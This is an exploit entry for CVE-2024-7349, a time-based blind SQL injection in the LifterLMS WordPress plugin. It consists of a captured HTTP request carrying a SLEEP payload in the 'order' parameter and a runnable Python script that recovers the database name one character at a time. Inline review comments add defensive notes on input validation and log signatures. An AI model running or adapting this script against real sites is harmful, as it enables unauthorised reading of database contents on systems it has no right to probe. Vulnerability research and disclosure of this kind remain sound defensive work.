# Exploit Title: LifterLMS - Blind SQL Injection
# Date: 09/2024
# Exploit Author: FURKAN KARAARSLAN
# Category: Webapps
# CVE : CVE-2024-7349
# Version: 7.6.3
# Vendor: https://lifterlms.com/
# Remotely Exploitable: Yes
# Authentication Required: Yes
# CVSSv3.1 Score: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
# Details: https://www.byresearchers.net/2024/09/cve-2024-7349-lifterlms-775.html
############################################################################
# Request:
# POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
# Host: 127.0.0.1
# Content-Length: 168
# Accept: application/json, text/javascript, */*; q=0.01
# Content-Type: application/x-www-form-urlencoded; charset=UTF-8
# X-Requested-With: XMLHttpRequest
# sec-ch-ua-mobile: ?0
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
# Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
# Cookie: wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5Zeq;
# Connection: close
#
# #action=export_admin_table&handler=Students&page=1&order=ASC,sleep(5)&orderby=name&filter=&filterby=course_membership&search=&#per_page=25&_ajax_nonce=98cedbc865&post_id=
############################################################################
# NOTE(review): the injection point shown above is the `order` value of the
# `export_admin_table` admin-ajax action (handler=Students). The header states
# an authenticated, high-privilege session is required (PR:H). Defensive
# reading: a correct implementation accepts only ASC/DESC for `order`; any
# other value (commas, SELECT, SLEEP) in that parameter is a detection signal,
# and affected installs (7.6.3 per the header; the fixed release is not stated
# on this page) should be updated.
#Exploit Code

import requests
import time

# Endpoint from the captured request: the WordPress admin-ajax dispatcher on
# the author's local test instance (every value below is pinned to 127.0.0.1).
url = "http://127.0.0.1/wordpress/wp-admin/admin-ajax.php"

# Headers copied verbatim from the captured browser request. NOTE(review): the
# Cookie and the `_ajax_nonce` used in find_db_name() are session-specific
# values from the author's test instance, and Content-Length is the captured
# request's fixed value rather than the length of the body built below; none
# of them is part of the vulnerability itself.
headers = {
    "Host": "127.0.0.1",
    "Content-Length": "168",
    "sec-ch-ua": '"Not-A.Brand";v="99", "Chromium";v="124"',
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "sec-ch-ua-mobile": "?0",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36",
    "sec-ch-ua-platform": '"Windows"',
    "Origin": "http://127.0.0.1",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Referer": "http://127.0.0.1/wordpress/wp-admin/admin.php?page=llms-reporting",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7",
    "Cookie": "wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5ZeqG1XUp22lD%7Ced0ece46aaebda96ea02600b26a591f260ecdb2ec7eec146285e45b994b19c0e; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5ZeqG1XUp22lD%7C24f5e9d7acbb1e7915b89f9375a0298dfabcd5d08f0f226d3831b46abdb27f11; wp_llms_session_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C%7C1718239319%7C%7C1718235719%7C%7C8ce81de66404741005a03ee3e5b747e1; wp-settings-time-1=1718217826",
    "Connection": "close"
}


def find_db_name() -> str:
    """Recover the MySQL DATABASE() name one character at a time through the
    time-based blind injection in the ``order`` parameter.

    Walks positions 1..20 and printable ASCII codes 32..126, sending one
    ``export_admin_table`` request per guess with ``order`` set to
    ``ASC,(SELECT IF(ASCII(SUBSTRING(DATABASE(),i,1))=c,SLEEP(2),0))`` and
    treating a round trip longer than 2 s as a confirmed character.

    Returns:
        The characters accepted so far (at most 20). A position with no hit
        is skipped rather than recorded, so the result can be shorter than
        the real name.

    Defender notes: the only attacker-controlled data is ``order``, which is
    presumably concatenated into an ORDER BY clause server-side (the plugin
    code is not on this page). In logs this shows as up to 95 near-identical
    admin-ajax.php POSTs per recovered character, each carrying SELECT/SLEEP
    in ``order``, with exactly one slow response among them.
    """
    db_name = ""
    for i in range(1, 21):  # character positions 1..20 of DATABASE()
        for c in range(32, 127):  # printable ASCII guesses for that position
            # Conditional delay: the database sleeps 2 s only when the guess
            # for position i equals c; otherwise the query returns at once.
            payload = f"action=export_admin_table&handler=Students&page=1&order=ASC,(SELECT IF(ASCII(SUBSTRING(DATABASE(),{i},1))={c},SLEEP(2),0))&orderby=name&filter=&filterby=course_membership&search=&per_page=25&_ajax_nonce=98cedbc865&post_id="
            start_time = time.time()
            response = requests.post(url, headers=headers, data=payload)
            end_time = time.time()
            # Wall-clock oracle: a round trip over 2 s counts as a hit; the
            # response body itself is never inspected.
            if end_time - start_time > 2:
                db_name += chr(c)
                print(f"Found character: {chr(c)} at position {i}")
                break
    return db_name


# Module-level side effect: the probe runs on import/execution using the
# captured cookie and nonce above.
database_name = find_db_name()
print(f"Database name: {database_name}")